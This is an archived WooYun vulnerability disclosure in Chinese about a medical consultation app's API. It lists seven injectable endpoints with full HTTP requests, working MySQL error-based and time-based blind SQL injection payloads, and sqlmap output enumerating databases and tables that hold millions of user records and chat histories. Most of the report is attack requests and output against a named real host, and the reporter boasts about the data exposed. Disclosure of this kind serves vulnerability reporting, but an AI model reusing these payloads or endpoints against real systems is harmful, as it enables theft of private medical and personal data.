乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-17: 细节已通知厂商并且等待厂商处理中 2015-04-22: 厂商已经主动忽略漏洞,细节向公众公开
312万用户信息,2122万聊天记录。吊炸天!还有合同信息!!!
礼包如下:
1.POST /api/m.php?randnum=0.3436146208550781 HTTP/1.1Content-Length: 307Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=chatend&chatid=(*)2.POST /api/m.php?randnum=0.404921563109383 HTTP/1.1Content-Length: 355Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=login&password=(*)&username=(*)3.POST /api/m.php?randnum=0.07986594829708338 HTTP/1.1Content-Length: 341Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=logout&userid=(*)4.POST /client/api.php?randnum=0.30327599309384823 HTTP/1.1Content-Length: 418Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=chatnow&doctorid=(*)&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user5.POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1Content-Length: 361Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=login&number=(*)&ver=1.36.POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1Content-Length: 359Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*action=login&number=e&password=(*)&ver=1.37.http://medapp.ranknowcn.com/client/image.php?key=(*)
---Parameter: key (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: key=' AND (SELECT 4808 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(4808=4808,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AYzU'='AYzU Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: key=' AND (SELECT * FROM (SELECT(SLEEP(5)))eThy) AND 'AyNZ'='AyNZ---web application technology: Nginx, PHP 5.3.5back-end DBMS: MySQL >= 5.0.0current user is DBA: Falseavailable databases [3]:[*] information_schema[*] lucky_draw[*] medappDatabase: lucky_draw+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| quotaQuestionSearch_static | 8409865 || quotaQuestionSearch_static2 | 1668219 || question_bak_20140826 | 984870 || chat_bak_20140826 | 914996 || answer_bak_20140826 | 913774 || `360search_sendurl_log` | 209444 || hospitalSellLog_updLog_bak1 | 131155 || sellLog | 82301 | ----------------->日志| sellLog_bak2 | 82110 || sellLog_bak1 | 74940 || searchHospital_keshi | 67054 || hospitalSellLog_invalidChat | 36319 || hetong | 3265 || searchHospital_hospital | 2771 |Database: medapp+------------------------------+---------+| Table | Entries |+------------------------------+---------+| chathistory | 21220288 | --------->2122万聊天记录| chatsourceLog | 18372907 || userAddrdetail | 15648638 || jihuo | 12418129 || iospush | 12005034 || userVisitLog | 9016552 || ios_xyz | 5330339 || record | 5000392 || ios_xyz2 | 4968693 || ios_xyz2_copy2 | 4961188 || quotaQuestionSearch | 4727017 || userDeviceid | 3822977 || logs_question | 3231583 || `user` | 3126644 | --------------->312万用户| question | 2665491 || question_all | 2571617 || chat | 2487796 || answer | 2485376 || logs_doctorlogin | 2243382 || ios_xyz2_copy | 1313491 || addrdetailLog | 1159968 || questionCountForDate | 734583 || logs_users | 656968 || temp_questions | 617653 || jihuo_macaddr | 590965 || hospitalSellLog_updLog | 558268 || gps_raw_data | 499429 || gps_cell | 365384 || gps_wifi | 342661 || iptable | 300132 || userAlias | 262960 || bj_base_station | 250502 || chatcomment | 236696 || chatclose | 224087 || chatchange | 161348 || chatUpdLog | 142630 || meiapp_mm_vote | 122459 || gps_pos | 117181 || quotaQuestion_test | 113152 || question_repeatLog | 105996 || uploadFile | 89077 || ios_xyz2_copy1 | 88297 || quotaQuestion | 86733 || publicQuestion | 82896 || userLeaveWords | 71036 || jihuoCountForDate | 69885 || cityhospital_keshi | 67054 || user_copy | 45704 || iospushmsg | 43265 || booking | 39305 || logs_hospital | 34670 || meiapp_news | 30347 |还有些敏感信息不贴出来了。
吊炸天,紧急修复!求 20 rank !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
危害等级:无影响厂商忽略
忽略时间:2015-04-22 18:42
漏洞Rank:15 (WooYun评价)
2015-04-22:多谢。由于最近发的漏洞太多,错过了,确认有点晚。